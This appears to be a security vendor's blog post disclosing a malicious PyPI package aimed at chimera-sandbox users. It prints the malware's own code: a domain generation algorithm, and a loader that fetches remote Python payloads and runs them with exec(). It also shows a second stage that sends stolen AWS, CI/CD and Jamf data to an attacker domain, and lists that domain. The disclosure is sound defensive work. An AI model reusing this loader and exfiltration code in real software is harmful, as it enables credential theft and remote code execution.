Multi-Stage Malware Attack on PyPI: Malicious Package Threatens Chimera Sandbox Users

chimera-sandbox-extensions - 863x300

Open-source package repositories like the Python Package Index (PyPI) play a crucial role in software development. However, these platforms are also potential targets for malicious actors attempting to exploit application software vulnerabilities.

The JFrog Security Research team regularly monitors open source software repositories using advanced automated tools, in order to detect malicious packages. In cases of potential software supply chain security threats, our research team reports any malicious packages that were discovered to the repository’s maintainers in order to have them removed.

Recently, the JFrog security team discovered and reported a malicious package that was uploaded to PyPI. The package was promptly removed by the PyPI maintainers after JFrog’s disclosure. Based on the package name, the package probably targets users of the chimera-sandbox environment and additionally aims to steal credentials and other sensitive information such as Jamf configuration, CI/CD environment variables, AWS tokens, and more.

Payload Analysis

Upon execution, the package initiates a complex sequence of actions. The function check_update() is called on initialization and begins by attempting to connect to multiple domains generated by a sophisticated pseudorandom DGA (Domain generation algorithm) defined in the CharStream class within the package.


 class CharStream:
    def __init__(self, seed: int = 0x1337, width: int = 10):
        self.S, self.width = list(range(256)), width
        self.i, self.j = 0, 0
        self.state = seed & 0xFFFF
        self.charset = string.ascii_lowercase + string.digits
        self._schedule()
    
    def _rand(self):
        taps = [16,14,13,11]
        feedback = 0
        for tap in taps:
            feedback ^= (self.state >> (tap - 1)) & 1
        
        feedback   ^=  (self.state ^ (self.state >> 3)) & 1
        self.state  = ((self.state << 1) | feedback) & 0xFFFF 
        self.state = (self.state ^ (self.state >> 7) ^ (self.state << 3)) ^ 0xFFFF
        return self.state 
    
    def _schedule(self):
        j = 0
        for i in range(256):
            j = (j + self.S[i] + self._rand()) & 0xFF
            self.S[i], self.S[j] = self.S[j], self.S[i]
    
    def _getval(self):
        i = (self.i + self._rand()) & 0xFF
        j = (self.j + self.S[i]) & 0xFF
        self.i, self.j = i, j
        self.S[i], self.S[j] = self.S[j], self.S[i]
        return self.S[(self.S[i] + self.S[j]) & 0xFF]
    def __next__(self):
        stream = ""
        for _ in range(self.width):
            r = self._getval()
            stream += self.charset[r % len(self.charset)]
        self._schedule()
        return stream
    def __iter__(self):
        return self

Domain generation mechanism deployed by the malicious package author

The domain generation process begins with the __init__ function, where the seed and width parameters are established, setting the stage for the sequence. An array undergoes shuffling based on the seed value, followed by the creation of a pseudo-random value through bit manipulation.

Subsequent calls to __next__ retrieve characters by indexing the randomized array. These selected characters are then joined to form a string of the specified width.

Despite the element of randomness, the consistent initial seed ensures that the same set of 10 addresses is generated each time per below:

  1. `bmehxcvbijyfpdg7.chimerasandbox[.]workers[.]dev/auth`
  2. `0l3qvp0sl3r5rgtl.chimerasandbox[.]workers[.]dev/auth`
  3. `covnn2rvaagchcq1.chimerasandbox[.]workers[.]dev/auth`
  4. `qn2q3zr7js6ubls6.chimerasandbox[.]workers[.]dev/auth`
  5. `twdtsgc8iuryd0iu.chimerasandbox[.]workers[.]dev/auth`
  6. `tnt69eqbib53nbj3.chimerasandbox[.]workers[.]dev/auth`
  7. `4hhmng1s9zobe8gk.chimerasandbox[.]workers[.]dev/auth`
  8. `tpur5v4nwlv62e7f.chimerasandbox[.]workers[.]dev/auth`
  9. `au6ewri21q4jcokh.chimerasandbox[.]workers[.]dev/auth`
  10. `x403y4difmiagvoo.chimerasandbox[.]workers[.]dev/auth`

Out of the ten generated domains, only one proves to be valid – which in this instance is number 5 –  twdtsgc8iuryd0iu.chimerasandbox[.]workers[.]dev/auth

In case of success, the first payload is downloaded and executed from the relevant URL.


 def check_update():
    cs = CharStream(0x749C, 16)
    domain = "\x63\x68\x69\x6d\x65\x72\x61\x73\x61\x6e\x64\x62\x6f\x78.\x77\x6f\x72\x6b\x65\x72\x73.dev"
    host = "https://{}.{}/{}"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Accept": "*/*",
        "Connection": "Keep-Alive",
    }
    result = None

    for attempt in range(10):
        subdom = next(cs)

        # Authentication phase
        try:
            req = request.Request(url=host.format(subdom, domain, "auth"), headers=headers, method="GET")
            with request.urlopen(req, timeout=10) as resp:
                if resp.status != 200:
                    continue
                headers["x-update-key"] = json.loads(resp.read())["token"]
            
            # Payload retrieval phase
            req = request.Request(url=host.format(subdom, domain, "check"), headers=headers, method="GET")
            with request.urlopen(req, timeout=10) as resp:
                if resp.status != 200:
                    continue
                
                old_key = headers["x-update-key"]
                headers["x-update-key"] = resp.headers.get("x-update-key", old_key)
                
                modl = types.ModuleType("checker")
                exec(resp.read(), modl.__dict__)
                result = modl.update(subdom, domain, headers)
                del modl
                break

        except Exception as e:
            continue
    return result


The function check_update() in the malicious package source code __init__.py

Initially, the malware retrieves an authentication token from the active domain:

chimera-sandbox-extensions - image5Token acquired from the malicious domain in order to receive the payload

Subsequently, using the token from the previous request, it requests and receives a secondary payload from the same address only on the /check path, which turns out to be a Python-based infostealer. The code automatically receives and executes the Python payload, more specifically the update() function inside the received code:

 
 def update(subdom, domain, headers):
    """stage2 entrypoint for probing"""
    try:
        # print("[stage2.web]: probing the host")

        host = "https://{}.{}/{}"
        host_info = get_execution_context()
        # print("===========================")
        # print(host_info)
        # print("===========================")
        data = json.dumps(host_info).encode("utf-8")

        # print("[stage2.web]: send probing and execute next stage")

        # print(f"host={host.format(subdom, domain, 'check')}")
        req = request.Request(
            url=host.format(subdom, domain, "check"),
            data=data,
            headers=headers,
            method="POST",
        )
        with request.urlopen(req, timeout=10) as resp:
            # print("[stage2.web] get the payload")

            headers["x-update-key"] = resp.headers.get("x-update-key", None)
            headers["x-platform-os"] = resp.headers.get("x-platform-os", None)
            headers["x-platform-arch"] = resp.headers.get("x-platform-arch", None)

            modl = types.ModuleType("updater")
            exec(resp.read(), modl.__dict__)
            result = modl.update(subdom, domain, headers)
            del modl
            return result

    except Exception as e:
        # print(f"[stage2.web] Failed to post the probing result: {e}")
        print("Error: Code 4")
        return None


Code received in the initial payload by the malicious package

This infostealer is designed to collect a range of sensitive information from the compromised environment. The function get_execution_context() performs data exfiltration which includes:

  1. JAMF receipts
  2. Pod sandbox environment authentication tokens and git information
  3. CI/CD information from environment variables
  4. Zscaler host configuration
  5. AWS account information and tokens
  6. Public IP address
  7. General platform, user, and host information

Unlike typical data-stealing malware, this variant targets data specific to corporate and cloud infrastructures. Once collected, this sensitive data is sent via a POST request back to the same domain. A JSON data structure is assembled from the collected information per below:

chimera-sandbox-extensions - image2JSON data structure sent to the malicious address with data examples

The server-side logic then processes the stolen information and determines whether to deliver a subsequent second payload for further malicious activity. However, this next payload was left undetermined, so the payload we managed to collect was the end of the execution:

chimera-sandbox-extensions - image7Final payload delivered by the malicious package in case of invalid target

Given that the subsequent payload will be downloaded and executed immediately, the risk is extremely high.

The JFrog security team promptly detected the malicious package on PyPI. Recognizing the potential threat it posed to users, the team immediately reported the package to the PyPI maintainers. The proactive measures taken by the JFrog security team demonstrate the importance of continuous monitoring and rapid response in securing the software supply chain.

Conclusion

The discovery of the malicious package highlights the ongoing risks associated with open source software repositories. It serves as a reminder for users to exercise caution when installing packages and to only rely on reputable sources. Additionally, it underscores the critical role of security teams in monitoring and responding to potential threats.

In this case, the malicious package distinguishes itself from typical information stealers through its highly targeted approach and multi-stage execution. Unlike many malicious packages that indiscriminately target users, this malware specifically focuses on corporate and cloud environments, aiming to exfiltrate sensitive information like JAMF receipts, CI/CD data, cloud tokens, and Zscaler configurations.

The multi-stage nature of the attack further enhances its sophistication, and prepares for a potentially more damaging second payload. This complexity and targeted methodology is what sets it apart from more generic open source malware threats we witnessed so far.

Users of chimera-sandbox and other similar environments should stay vigilant and keep their software up to date to protect themselves from such threats. Since the next payload was left undetermined, users are strongly advised to revoke any potentially compromised tokens and remove the malicious package immediately. JFrog Xray has been updated to detect this malicious package, providing an added layer of security for our customers.

Keep your software supply chain secure by checking out the JFrog Security Research center for more information about the latest CVEs, vulnerabilities and fixes. For more information about JFrog’s security solutions feel free to take an online tour, set up a one on one demo or start a free trial at your convenience.